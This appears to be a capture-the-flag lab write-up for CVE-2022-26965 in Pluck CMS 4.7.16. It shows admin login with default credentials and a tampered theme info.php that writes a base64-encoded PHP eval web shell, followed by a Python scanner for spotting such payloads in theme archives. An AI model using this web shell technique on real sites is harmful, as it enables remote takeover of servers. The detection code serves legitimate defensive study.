CVE-2022-26965
I. Vulnerability description
Pluck-CMS-Pluck-4.7.16 admin back-end RCE
II. Penetration steps
1. Open the website
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/?file=cm
2. Log in to the admin back end
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/login.php
# Username: admin
# Password: admin
3. Change the language
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/admin.php?action=language
4. Install a theme
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/admin.php?action=theme
5. Download a theme
https://github.com/billcreswell/redline-theme
6. Modify the info.php file
<?php
file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSkgPz4='));
?>
7. Compress the files
8. Upload the file
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/admin.php?action=themeinstall
9. View the flag value
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/shell.php
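
A defensive check for the theme upload described above, as an added example (not code from the original write-up or from Pluck): a scanner that inspects a theme archive before installation and flags PHP members that write files, execute code, or carry base64 literals that decode to PHP. The function names, the risky-call list and the sample archives are assumptions made for illustration.

```python
import base64
import io
import re
import zipfile

# Assumed policy: theme PHP files should not write files, run code, or decode blobs.
RISKY_CALLS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|"
    r"file_put_contents|fwrite|base64_decode|gzinflate)\s*\(", re.I)
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)

def scan_theme_zip(data: bytes) -> list:
    """Return (member, reason) findings for a theme archive given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.startswith(("/", "\\")) or ".." in name.replace("\\", "/").split("/"):
                findings.append((name, "path escapes theme directory"))
                continue
            if info.is_dir() or not PHP_EXT.search(name):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            for call in sorted({m.group(1).lower() for m in RISKY_CALLS.finditer(text)}):
                findings.append((name, f"calls {call}()"))
            for literal in B64_LITERAL.findall(text):
                try:
                    decoded = base64.b64decode(literal, validate=True)
                except ValueError:  # not valid base64 after all
                    continue
                if b"<?" in decoded:
                    findings.append((name, "base64 literal decodes to PHP code"))
    return findings

def make_zip(files: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for path, content in files.items():
            zf.writestr(path, content)
    return buf.getvalue()

# Constructed samples (the clean info.php content is invented, not Pluck's format).
CLEAN = make_zip({"redline/info.php": "<?php $themename = 'Redline'; ?>",
                  "redline/style.css": "body { color: #900; }"})
TAMPERED = make_zip({"redline/info.php": "<?php\nfile_put_contents('shell.php',"
    "base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSkgPz4='));\n?>"})
if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(label, scan_theme_zip(blob))
```

A pattern scan like this is a triage aid; the stronger control is to keep the theme directory from executing uploaded PHP at all and to restrict who can reach the theme installer.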